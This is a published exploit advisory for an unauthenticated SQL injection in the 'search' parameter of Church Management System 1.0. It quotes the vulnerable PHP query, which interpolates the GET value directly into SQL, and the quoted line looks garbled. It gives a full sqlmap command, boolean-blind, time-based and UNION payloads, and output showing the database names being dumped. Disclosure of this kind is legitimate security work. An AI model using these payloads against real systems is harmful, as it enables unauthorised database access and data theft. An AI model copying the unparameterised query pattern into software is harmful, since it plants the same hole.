# Exploit Title: Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)  
# Exploit Author: Erwin Krazek (Nero)  
# Date: 17/09/2021  
# Vendor Homepage:  
# Software Link:  
# Vendor: oretnom23  
# Version: v1.0  
# Tested on: Linux, Apache, Mysql  
# Exploit Description:  
Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in 'search' parameter allowing remote attackers to dump the SQL database using SQL Injection attack.  
# Vulnerable Code  
In search.php on line 28  
$count_all = $conn->query("SELECT b.*,concat(u.firstname,' ',u.lastname) as author FROM `blogs` b inner join `users` u on b.author_id = where b.`status` =1 and (b.`title` LIKE '%{$_GET['search']}%' OR b.`meta_description` LIKE '%{$_GET['search']}%' OR b.`keywords` LIKE '%{$_GET['search']}%' OR b.`content` LIKE '%{$_GET['search']}%' )")->num_rows;  
Sqlmap command:  
sqlmap -u 'http://localhost/church_management/?p=search&search=abcsw' -p search --level=5 --risk=3 --dbs --random-agent --eta --batch  
Parameter: search (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: p=search&search=abcsw') OR NOT 4306=4306-- rFTu  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: p=search&search=abcsw') AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)-- zpac  
Type: UNION query  
Title: Generic UNION query (NULL) - 14 columns  
Payload: p=search&search=abcsw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL-- -  
[17:33:38] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Debian  
web application technology: Apache 2.4.46, PHP  
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)  
[17:33:38] [INFO] fetching database names  
available databases [4]:  
[*] church_db  
[*] information_schema  
[*] mysql  
[*] performance_schema